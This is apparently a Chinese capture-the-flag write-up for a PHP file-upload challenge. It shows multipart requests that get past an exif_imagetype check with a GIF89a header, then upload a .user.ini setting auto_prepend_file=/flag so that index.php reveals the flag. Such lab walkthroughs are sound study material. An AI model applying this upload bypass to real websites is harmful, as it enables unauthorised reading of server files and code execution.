image-20260527140725233

先上传一个空图片文件试试水,响应exif_imagetype:not image!

加个gif头上传成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Content-Disposition: form-data; name="fileUpload"; filename="100.png"
Content-Type: image/png

GIF89a
------WebKitFormBoundaryH6gYDAtWK7NZlGuJ

响应:

Your dir uploads/e1891fb0b9f190933b53ba7b05c12d2a <br>Your files : <br>array(4) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(7) "100.png"
  [3]=>
  string(9) "index.php"
}

看响应我们可以看到在我们上传文件所在文件夹中有我们上传的文件还有php文件,这里可以尝试采用.user.ini和.htaccess配置文件上传

测试是发现**<?**是被过滤了的

这里我直接上传一个.user.ini文件,然后访问index.php就得到flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Content-Disposition: form-data; name="fileUpload"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file=/flag

响应:

Your dir uploads/e1891fb0b9f190933b53ba7b05c12d2a <br>Your files : <br>array(4) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(9) ".user.ini"
  [3]=>
  string(9) "index.php"
}